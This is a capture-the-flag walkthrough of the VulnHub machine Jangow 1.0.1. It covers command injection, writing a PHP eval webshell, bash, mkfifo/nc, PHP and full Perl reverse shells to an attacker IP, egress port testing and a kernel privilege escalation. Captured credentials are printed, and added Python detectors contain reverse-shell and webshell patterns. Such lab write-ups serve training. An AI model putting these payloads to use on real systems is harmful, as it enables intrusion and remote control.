JANGOW: 1.0.1

Target description and download: Jangow: 1.0.1 ~ VulnHub
Note: if the VM cannot detect the target's IP after booting, see the fix in: VulnHub target IP not detected

1. Information Gathering

1.1. Host Discovery

netdiscover  -r 192.168.226.0/24

[Screenshot: JANGOW 1.0.1 - 1.jpg]

  • Target IP: 192.168.159.153

1.2. Port Scan

nmap -A 192.168.159.153 -p1-65535

[Screenshot: JANGOW 1.0.1 - 2.jpg]

Port 21 is open, so a remote login can be tried later [weak credentials]; port 80 gets further web reconnaissance.

1.3. Web Reconnaissance

  • Browse the site and enumerate directories

[Screenshot: JANGOW 1.0.1 - 4.jpg]

Clicking around turned up an interesting endpoint, http://192.168.159.153/site/busque.php?buscar=. Passing it a value showed that it has RCE, so during exploitation we can try writing a webshell or getting a reverse shell directly.

[Screenshot: JANGOW 1.0.1 - 5.jpg]

dirsearch -u "http://192.168.159.153/"

[Screenshot: JANGOW 1.0.1 - 3.jpg]

There is a backup file; opening it gives database information, including a username and password. Since port 21 was found open earlier, these credentials can be tried for a login later.

[Screenshot: JANGOW 1.0.1 - 6.jpg]

2. Exploitation

2.1. Trying a reverse shell

Running the command below through http://192.168.159.153/site/busque.php?buscar= got no response; some restriction is probably in place, more on that later.
Reverse shell one-liners: online quick-generation tool

bash -i >& /dev/tcp/192.168.159.152/4444 0>&1

[Screenshot: JANGOW 1.0.1 - 7.jpg]

2.2. Trying to write a webshell

  • Since PHP files are executed normally, write a PHP webshell and test the connection with AntSword (蚁剑).
echo '<?php eval($_POST["shell"]);' > webshell.php

http://192.168.159.153/site/busque.php?buscar=echo '<?php eval($_POST["shell"]);' > webshell.php , then run ls to check whether the file was written.
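As an added example (not part of the original post, and written in Python rather than the shell used here), this is the detection logic a defender would run over Apache access logs to spot both the command injection against busque.php?buscar= and the webshell drop described above; the log lines are constructed, and the rule set is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (not taken from the original post); the endpoint
# and payloads mirror the ones the walkthrough sends to busque.php?buscar=.
SAMPLE_LOG = """\
192.168.159.152 - - [10/Mar/2025:10:00:01 +0000] "GET /site/busque.php?buscar=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.159.152 - - [10/Mar/2025:10:00:05 +0000] "GET /site/busque.php?buscar=bash%20-i%20%3E%26%20/dev/tcp/192.168.159.152/4444%200%3E%261 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.159.152 - - [10/Mar/2025:10:00:09 +0000] "GET /site/busque.php?buscar=echo%20%27%3C%3Fphp%20eval(%24_POST%5B%22shell%22%5D)%3B%27%20%3E%20webshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.159.152 - - [10/Mar/2025:10:00:12 +0000] "GET /site/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# source, timestamp, method, request path (with query) and status of a combined-format line
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded value of every query parameter (assumed rule set).
RULES = {
    "shell-metachar": re.compile(r"[;|&`$]"),                          # command chaining / substitution
    "reverse-shell": re.compile(r"/dev/tcp/|\bnc\b|mkfifo|\b(ba)?sh -i"),
    "webshell-write": re.compile(r"<\?php|\beval\s*\(|>\s*\S+\.php"),  # dropping a PHP file
}

def scan_line(line):
    """Return a finding dict for a suspicious request, or None for a clean or unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
    values = [v for vs in params.values() for v in vs]          # parse_qs already URL-decodes
    hits = sorted(name for name, rx in RULES.items() if any(rx.search(v) for v in values))
    if not hits:
        return None
    return {"src": m["src"], "ts": m["ts"], "path": m["path"], "rules": hits}

def scan_log(text):
    """Scan a whole log and return the findings in order of appearance."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]
```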

[Screenshot: JANGOW 1.0.1 - 8.jpg]

Written successfully; connect with AntSword.

[Screenshot: JANGOW 1.0.1 - 9.jpg]

[Screenshot: JANGOW 1.0.1 - 11.jpg]

There is a WordPress install; look at its config file /wordpress/config.php

[Screenshot: JANGOW 1.0.1 - 12.jpg]

Another set of database connection credentials; testing them in the browser shows they are wrong, but note the account and password down, they may still be useful.

[Screenshot: JANGOW 1.0.1 - 13.jpg]

Browsing the files turns up the first flag.

[Screenshot: JANGOW 1.0.1 - 14.jpg]

Privileges are too low; time to get another reverse shell and escalate.

2.3. Reverse shell via AntSword

I tried several kinds of shell and all of them failed; stuck...
Looking at other people's write-ups, the target restricts ports and only 443 is usable...
Following sainet's approach: on the attacking machine, first redirect all ports 1-65535 to one specific port, then run a script on the target to test which ports get through.

iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 4444

[Screenshot: JANGOW 1.0.1 - 15.jpg]

Start a listener on Kali

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444

On the target, create the script [port_script.sh] with AntSword, make it executable and run it

#!/bin/bash
# try every port once with a 1 s timeout and record the result in out.txt
for i in {1..65534};
do
   timeout 1 nc -vz 192.168.159.152 $i && echo "$i open" >> out.txt || echo "$i close" >> out.txt;
done

[Screenshot: JANGOW 1.0.1 - 17.jpg]

[Screenshot: JANGOW 1.0.1 - 16.jpg]
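Seen from the web server's side, the port test above is one outbound connection per second to a different port on the same peer, which is exactly the shape an egress filter is meant to stop and a flow monitor is meant to flag. The following is an added example (not from the original post, written in Python rather than shell) that detects such an outbound port sweep in flow records; the CSV record format "epoch,src,dst,proto,dport", the sample data, and the window and threshold values are all constructed assumptions.

```python
from collections import defaultdict

WINDOW_S = 60     # assumption: sliding window length in seconds
THRESHOLD = 50    # assumption: distinct destination ports per peer that trigger an alert

def parse_flow(line):
    """Parse one constructed record 'epoch,src,dst,proto,dport' (not a real tool's format)."""
    ts, src, dst, proto, dport = line.strip().split(",")
    return int(ts), src, dst, proto, int(dport)

def max_distinct_ports(events, window=WINDOW_S):
    """events: time-sorted (ts, dport) tuples for one (src, dst) pair.
    Returns the largest number of distinct ports seen within any window-second span."""
    counts, best, left = {}, 0, 0
    for ts, port in events:
        counts[port] = counts.get(port, 0) + 1
        while ts - events[left][0] > window:          # drop records that fell out of the window
            old = events[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best

def detect_port_sweeps(lines, window=WINDOW_S, threshold=THRESHOLD):
    """Return {(src, dst): distinct_ports} for every pair whose TCP sweep reaches the threshold."""
    pairs = defaultdict(list)
    for line in lines:
        ts, src, dst, proto, dport = parse_flow(line)
        if proto == "tcp":
            pairs[(src, dst)].append((ts, dport))
    alerts = {}
    for pair, events in pairs.items():
        events.sort()
        n = max_distinct_ports(events, window)
        if n >= threshold:
            alerts[pair] = n
    return alerts

def constructed_flows():
    """Constructed sample: clients hitting the web server, the server's own DNS lookups,
    and the server opening one connection per second to ports 1..300 on a single peer."""
    base = 1700000000
    lines = [f"{base + i},192.168.159.10,192.168.159.153,tcp,80" for i in range(0, 120, 2)]
    lines += [f"{base + i},192.168.159.153,192.168.159.1,udp,53" for i in range(0, 120, 10)]
    lines += [f"{base + i},192.168.159.153,192.168.159.152,tcp,{i + 1}" for i in range(300)]
    return lines
```

With the constructed data, detect_port_sweeps(constructed_flows()) reports only the web server's sweep towards 192.168.159.152, since the client traffic reuses port 80 and the DNS records are not TCP.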

Remove the iptables rule (listing the nat table confirms it is gone), then get the reverse shell on port 443

iptables -t nat -nvL

Upload perl-reverse-shell.pl with AntSword and run it [with the port changed to 443]
perl-reverse-shell.pl

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  The author accepts no liability
# for damage caused by this tool.  If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#

use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
# "reverse" refers to the direction: the attacker connecting to the target is forward,
# the target sending a connection request to the attacker is reverse
my $ip = '192.168.159.152';	# send the connection request to the attacker's IP
my $port = 443;			# on this port of the attacker's IP
# the attacker must already be listening on that port, i.e. with the Swiss-army-knife tool: nc -lvvp 443

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
		# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
	cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

	if ($auth) {
		unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
			cgiprint("ERROR: Your client isn't authorised to view this page");
			cgiexit();
		}
	}
} elsif ($auth) {
	cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
	cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
	my $pid = fork();
	if ($pid) {
		cgiexit(0); # parent exits
	}

	setsid();
	chdir('/');
	umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
	cgiprint("Sent reverse shell to $ip:$port");
	cgiprintpage();
} else {
	cgiprint("Couldn't open reverse shell to $ip:$port: $!");
	cgiexit();	
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
	my $line = shift;
	$line .= "<p>\n";
	$global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
	cgiprintpage();
	exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
	print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

Result

[Screenshot: JANGOW 1.0.1 - 18.jpg]

Clearly insufficient privileges; escalation is needed.

2.4. More ways to get a shell

There are several ways to get the reverse shell here; two more examples
First start a listener on port 443 on Kali
Option one, run in the AntSword terminal:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.152 443 >/tmp/f

[Screenshot: JANGOW 1.0.1 - 24.jpg]

Option two, create a new PHP file with the following content:

<?php 
	system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.152 443 >/tmp/f');
?>

Trigger it by visiting the file in the browser

[Screenshot: JANGOW 1.0.1 - 25.jpg]

This shell is still limited; spawn a local tty to get a more fully interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

[Screenshot: JANGOW 1.0.1 - 26.jpg]

Note: the reverse shell is needed for privilege escalation, and switching users also requires a local tty!

2.5. Privilege escalation

Get the system version information to look up a privilege escalation vulnerability

uname -a
# show the kernel version
lsb_release -a
# exact release version of the current distribution

[Screenshot: JANGOW 1.0.1 - 19.jpg]

Search for an exploit matching the version: Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

[Screenshot: JANGOW 1.0.1 - 20.jpg]

Upload the downloaded 45010.c to the target with AntSword and compile it with gcc

[Screenshot: JANGOW 1.0.1 - 21.jpg]

AntSword's virtual terminal cannot run the exploit directly, so escalate from the reverse shell obtained earlier

[Screenshot: JANGOW 1.0.1 - 22.jpg]

[Screenshot: JANGOW 1.0.1 - 23.jpg]

Got the flag in the root directory. [Privilege escalation was not smooth: of the several exploits I tried, only this one worked]

2.6. FTP login test

One last addition: port 21 was found open earlier, so try logging in with the credentials collected above. Only jangow01/abygurl69 gets in, but the privileges are minimal and files cannot be uploaded...

[Screenshot: JANGOW 1.0.1 - 27.jpg]

Check the terminal privileges with the earlier shell
[Screenshot: JANGOW 1.0.1 - 28.jpg]

posted @ z9m8r8